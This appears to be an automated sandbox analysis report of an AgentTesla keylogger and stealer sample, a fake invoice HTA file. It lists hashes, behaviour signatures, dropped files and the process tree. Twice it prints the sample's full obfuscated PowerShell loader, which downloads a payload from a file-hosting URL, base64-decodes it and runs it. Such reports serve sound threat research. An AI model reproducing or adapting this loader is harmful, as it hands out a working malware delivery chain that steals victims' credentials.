Overview

overview

10

Static

static

1

0017618017...IF.hta

windows7-x64

10

0017618017...IF.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta

  • Size

    5KB

  • MD5

    3ef5759d457c58dc4c8c9b6c15aca5fe

  • SHA1

    be35dffec6716bfe6ece66f7e140b8df97d5b994

  • SHA256

    17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32

  • SHA512

    c6b8c4452b774cd782b75891048ca0aacf1ffd0af55536e0d3a7643b6821b46004225b47bc4fbc81fd95c5f6f6aa0eb6dc34f659d0654b29a05b521c431b45e8

  • SSDEEP

    96:buOGiiV+5y/gkgBONHwBB9HaXa3U+1hTIbtu7ZEhtNsim57V+ICgCtUfkX:ypD/gkgywP9HaKk+rTIBeuhtNN2CLtUY

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
        3⤵
          PID:2708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2128
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
            4⤵
              PID:2300
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:772

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Fdegodserne.Con
        Filesize

        492KB

        MD5

        1fe03ff02fd5bae7e909af7c3471a4c7

        SHA1

        cb1bb668c0e0191b63d7aac5ecd4117b8d05647e

        SHA256

        b9aa136cd82e7b1c7381598d12be3297722ef09c005344168594fc5a1ed1414b

        SHA512

        83d9a6c8de897c7d98b30117f7a94bd1048e33cd47961d75fd6ac0c7cf870ad6949265485b91a899f81fd5a0fca03a295281c4a6e46f29034b1db11b61e9696d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        8b440fa10a50e50914834593003b11e3

        SHA1

        6d5ba40eb8cee52d35b868528e22426ee8af1522

        SHA256

        2b354ddf661155540d79b8e6929894ce48d3fbd2d922e2620c32257e2209b09f

        SHA512

        9c04fa268015ac8a945aa971fd24db85df807a766276b2f22cae9c1a5156e52a6fb4228f3031a296336fd115fe45ec5bbe7537d115accd4176179aa6d919df08

        Download Submit

      • memory/772-38-0x0000000000620000-0x0000000001682000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/772-39-0x0000000000620000-0x0000000000662000-memory.dmp

        Filesize

        264KB

        Download

      • memory/2128-15-0x00000000066F0000-0x000000000A562000-memory.dmp

        Filesize

        62.4MB

        Download